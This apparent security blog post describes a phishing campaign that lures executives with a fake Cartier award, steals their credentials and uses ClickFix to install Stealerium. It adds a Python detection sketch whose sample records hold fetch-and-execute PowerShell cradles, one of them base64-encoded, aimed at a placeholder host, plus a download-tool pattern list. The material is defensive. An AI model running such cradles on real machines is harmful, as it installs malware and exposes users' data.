A phishing campaign is targeting executives with phony offers for awards, according to researchers at Trustwave SpiderLabs. The attackers first dupe the victims into handing over their credentials, then use the ClickFix social engineering technique to trick them into installing malware.
“The campaign uses a high-value executive recognition lure, ‘Cartier Recognition Program,’ to target executives,” the researchers write. “It includes a password-protected ZIP and personalized details to appear legitimate, urging the victim to open the attached ‘secure digital package’ to claim the reward, setting up the credential phish and malware chain that follows.”
The password-protected ZIP contains an HTML file. When the user opens it, they are shown a fake login portal tailored to impersonate their email provider, which captures whatever credentials are entered. The password protection is not for the victim's benefit: it keeps mail-filtering engines from inspecting the archive's contents. Once the credentials have been sent to the attackers, the victim is shown a phony error page, which starts the ClickFix stage of the attack.
ClickFix is a social engineering technique that tricks users into copying a malicious command and pasting it into a console on their own computer, so no exploit is needed and the download runs under the user's own account from a console the user launched. In this case, the fake error page tells the user to open a Windows command prompt and paste in a PowerShell command; that command fetches a stager, which in turn installs the Stealerium information stealer.
“The malicious SVG shows a fake Chrome ‘Aw, snap!’ error and instructs the user to run a PowerShell ‘fix’ in cmd,” the researchers write. “This ClickFix trick turns a simple image download into user-driven code execution, launching the stager that installs Stealerium.”
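Because the ClickFix stage makes the victim the execution vector, endpoint telemetry is where it shows up: a console launched from the desktop shell whose command line fetches and runs remote content. The Python below is an added example, not code from Trustwave SpiderLabs or from the article. The process-creation records, user names and the URL (example.invalid) are constructed for illustration; the field names follow the shape Sysmon Event ID 1 or Windows Security 4688 records take after JSON normalisation. It also decodes -EncodedCommand payloads, since the visible command line of a pasted "fix" often hides the download cradle inside base64.

```python
"""Detection sketch for ClickFix-style, user-pasted console commands.

Scans normalised process-creation records for an interactive shell spawned
from the desktop shell (or from another interactive shell) whose command line,
or decoded -EncodedCommand payload, contains a download-and-execute cradle.

All records below are CONSTRUCTED samples for illustration; nothing here is
taken from the Trustwave SpiderLabs report.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Indicators that a command fetches and runs remote content. Matched
# case-insensitively against the raw command line and the decoded payload.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
    r"invoke-webrequest", r"\biwr\b", r"invoke-restmethod", r"\birm\b",
    r"\bcurl\b", r"\bwget\b", r"bitsadmin", r"mshta", r"certutil.+-urlcache",
    r"https?://",
]
CRADLE_RE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)

# Shells a ClickFix lure tells the victim to open, and the parents that mean a
# human launched them (explorer.exe = Start menu / Run box, or a nested shell).
USER_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}

# -e, -ec, -en, -enc ... -encodedcommand (PowerShell accepts any unambiguous
# prefix) followed by a base64 blob. Does not match -ExecutionPolicy.
ENCODED_RE = re.compile(r"[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_for_powershell(script: str) -> str:
    """What -EncodedCommand expects: base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    record_id: int
    user: str
    reason: str
    evidence: str


def assess(record: dict, record_id: int) -> Optional[Finding]:
    """Flag an interactive shell, launched interactively, that runs a cradle."""
    image = basename(record.get("Image", ""))
    parent = basename(record.get("ParentImage", ""))
    cmdline = record.get("CommandLine", "")
    if image not in USER_SHELLS or parent not in INTERACTIVE_PARENTS:
        return None
    decoded = decode_encoded_command(cmdline)
    for label, text in (("command line", cmdline), ("decoded -EncodedCommand", decoded)):
        if text and CRADLE_RE.search(text):
            reason = f"download cradle in {label} of {image} spawned by {parent}"
            return Finding(record_id, record.get("User", "?"), reason, text.strip())
    return None


def scan(records) -> list:
    return [f for f in (assess(r, i) for i, r in enumerate(records)) if f]


# Constructed sample telemetry (hypothetical hosts, users and URL).
SAMPLE_RECORDS = [
    {   # 0: pasted into a cmd window opened from the Start menu -> flagged
        "User": "CORP\\cfo", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": 'cmd.exe /c powershell -w hidden -c "iex (iwr https://example.invalid/fix.ps1)"'},
    {   # 1: cradle hidden in base64; raw line has no keywords -> flagged via decode
        "User": "CORP\\cfo", "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
        + encode_for_powershell("Invoke-WebRequest -Uri https://example.invalid/s.txt | Invoke-Expression")},
    {   # 2: same cradle from a service host (patch/management agent) -> not flagged
        "User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -File C:\\Agent\\update.ps1 -Uri https://example.invalid/update"},
    {   # 3: ordinary interactive use -> not flagged
        "User": "CORP\\cfo", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoExit -Command Get-ChildItem"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"record {f.record_id} user={f.user}: {f.reason}\n    {f.evidence}")
```

The parent-process filter is what separates a pasted "fix" from legitimate automation: management agents also run download cradles, but they are not children of explorer.exe. Tune INTERACTIVE_PARENTS to the shells and terminals in use (Windows Terminal, for example, appears as a different parent), and treat the decoded payload, not the raw line, as the evidence to triage.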
AI-powered security awareness training can give your organization an essential layer of defense against phishing and other social engineering attacks. KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
GB Hackers has the story.
